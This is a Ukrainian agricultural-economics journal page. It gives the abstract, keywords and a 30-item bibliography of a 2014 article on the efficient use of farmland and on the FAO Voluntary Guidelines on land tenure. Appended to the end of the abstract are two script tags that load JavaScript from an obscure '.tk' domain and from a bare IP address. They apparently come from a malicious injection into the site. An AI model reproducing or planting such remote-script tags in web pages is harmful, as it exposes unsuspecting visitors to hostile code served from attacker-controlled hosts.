ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 332.2
Сторінка молодого науковця

Шляхи забезпечення ефективного використання земель у сільськогосподарському виробництві / Лазеба Є. С. // Економіка АПК. - 2014. - № 8 - С. 101

Питанням, актуальність якого не змінюється з часом, є ефективність використання земель у сільському господарстві. Враховуючи такі основні властивості земель, як родючість та обмеженість у просторі, питання правильного й раціонального використання земельних ресурсів набуває першочергового значення. Для розробки і прийняття ефективних управлінських рішень стосовно поліпшення землекористування слід зрозуміти сутність ефективного використання земель. Узагальнено підходи науковців щодо розуміння терміна “земля”. Уточнено сутність поняття “ефективність використання земель”, що уможливить прийняти ефективні рішення щодо збереження та поліпшення стану земель у сільському господарстві. Досліджено стан і запропоновано шляхи реалізації Добровільних керівних принципів із відповідального управління й доступу до земельних, рибних і лісових ресурсів у контексті національної продовольчої безпеки Україні. Дотримання принципів забезпечить створення умов для ефективного використання земель у сільському господарстві та максимального збереження їхніх властивостей. Табл.: 1. Бібліогр.: 30.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: земля, ефективність, ефективність використання земель, добровільні керівні принципи, сільське господарство, закон, раціональне використання земель

Список використаних джерел

 1. Андрейцев В.І. Об’єкти земельних правовідносин за новим Земельним кодексом України / В.І. Андрейцев // Науково-практичні коментарі. – 2002. – №2. – С.14.
 2. Борисов А.Б. Большой экономический словарь. Изд. 2-е перераб. и доп. / А.Б. Борисов. – М.: Книжный мир, 2006. – 860 с.
 3. Будзяк О.С. Екологобезпечне використання земель: теоретичні та практичні аспекти / О.С. Будзяк. – К.: Аграр Медіа Груп, 2011. – 326 с.
 4. Гарнага О. Теоретичні засади забезпечення раціонального землекористування / О. Гарнага // Економіст. – 2011. – № 12 – С. 41-44.
 5. Государственный стандарт Союза ССР. Земли. Термины и определения. ГОСТ 26640-85 / Изд. офиц. – М.: Изд-во стандартов, 1989. – С.2.
 6. Гуторов О.І. Оцінка земель і ресурсного потенціалу в сільському господарстві: теоретичні та практичні підходи : моногр. / О.І. Гуторов, І.О. Шарко; Харк. нац. аграр. ун-т ім. В.В. Докучаєва. – Х.: ХНАУ; Вид-во “Точка”, 2012. – 256 с.
 7. Добряк Д. Земля порядок любить / Д.Добряк // Уряд. кур’єр. – 2006. – № 48. – С. 10.
 8. Другак В.М. Нова парадигма управління земельними ресурсами та землекористуванням в Україні / В.М. Другак, Р. М. Курильців, Н. А. Третяк // Земельне право України: теорія і практика. – 2012. – № 2. – С. 14-21.
 9. Економічний енциклопедичний словник: у 2 т. Т. 1 ; за ред. С. Мочерного. – Львів: Світ, 2005. – 616 с.
 10. Загородній А.Г. Фінансово-економічний словник. / А.Г. Загородній, Г.Л. Вознюк. – К.: Знання, 2007. – 1072 с.
 11. Земельний кодекс України [Електронний ресурс]. – Режим доступу : – http://zakon.rada.gov.ua.
 12. Конопліцький В.А. Економічний словник. Тлумачно-термінологічний / В.А. Конопліцький, Г.І. Філіна. – К.: КНТ, 2007. – 580 с.
 13. Конституція України [Електронний ресурс]. – Режим доступу : –http://zakon.rada.gov.ua.
 14. Кіптач Ф. Землі України: категорії, право власності, стан використання, охорона : навч. посіб. / Федір Кіптач. – Львів : Видавничий центр ЛНУ ім. Івана Франка, 2010. – 240 с.
 15. Лебеденко О.В. Розвиток ефективного використання землі суб’єктами аграрного господарювання / О.В. Лебеденко : автореф. дис. на здобуття наук. ступеня канд. екон. наук: спец. 08.00.04. – Дніпропетровськ, 2009. – 24 с.
 16. Липчук В.В. Ефективність використання земельних угідь у сільському господарстві : моногр. // В.В. Липчук, О. В. Лисюк. – Львів: СПОЛОМ, 2008. – 182 с.
 17. Лютый Я.И. Прогнозирование и планирование использования земельных ресурсов: учеб. пособ. / Я.И. Лютый. – К.: Изд-во УСХА, 1991. – 136 с.
 18. Мармуль Л.О. Регіональне управління та регулювання використання земельних ресурсів : моногр. / Л.О. Мармуль, В.А. Романова / – К.: ННЦ ІАЕ, 2007. – 192 с.
 19. Новаковський Н.Я. Шляхи удосконалення законодавчого забезпечення розвитку земельних відносин в Україні / Л.Я. Новаковський // Економіка АПК. – 2009. – № 3. – С. 21-23.
 20. Носік В.В. Земля як об’єкт права власності / В.В. Носік // Вісн. Київського нац. ун-ту імені Тараса Шевченка. Серія Юридичні науки. – 2000. – Вип.38. – С. 34.
 21. Природно-ресурсний потенціал сталого розвитку України / [Б.М. Данилишин, С.І. Дорогунцов, В.С. Міщенко, Я.В. Коваль та ін.]. – К.: РВПС України, 1999. – 716 с.
 22. Про охорону земель : Закон України [Електронний ресурс]. – Режим доступу : – http://zakon.rada.gov.ua.
 23. Словник сучасної економіки МАКМІЛЛАНА ; пер. з англ. – К.: “АртЕк”, 2000. – 640 с.
 24. Титова Н. До концепції нового основного земельного закону України / Н. Титова // Право України. – 2000. – №4. – С.69.
 25. Федоров М.М. Трансформація земельних відносин до ринкових умов (доп.) / М.М. Федоров // Трансформація земельних відносин до ринкових умов : зб. матер. Одинадцятих річних зборів Всеукр. конгр. вчен. економістів-аграрників, К., 26-27 лют. 2009 р. / [Редкол.: П.Т. Саблук та ін.]. – К. : ННЦ ІАЕ, 2009. – С. 5-24.
 26. Хвесик М.А. Інституціональні трансформації та фінансово-економічне регулювання землекористування в Україні : моногр. / М.А. Хвесик, В.А. Голян, А.І. Крисак. – К.: Кондор, 2007. – 522 с.
 27. Шаманаев В.С. Эффективность использования земли в условиях индустриализации сельского хозяйства / В.С. Шаманаев. – М.: Колос, 1979. – 208 с.
 28. A Brief Introduction to the Voluntary Guidelines on the Responsible Governance of Tenure of Land, Fisheries and Forests in the Context of National Food Security [Електронний ресурс]. – Режим доступу – http://www.landportal.info.
 29. Oxford English Dictionary [Електронний ресурс]. – Режим доступу : – http://www.oed.com.
 30. Voluntary Guidelines on the Responsible Governance of Tenure of Land, Fisheries and Forests in the Context of National Food Security [Електронний ресурс]. – Режим доступу – http://www.fao.org.
Читати статтю: 14_08_101-107.pdf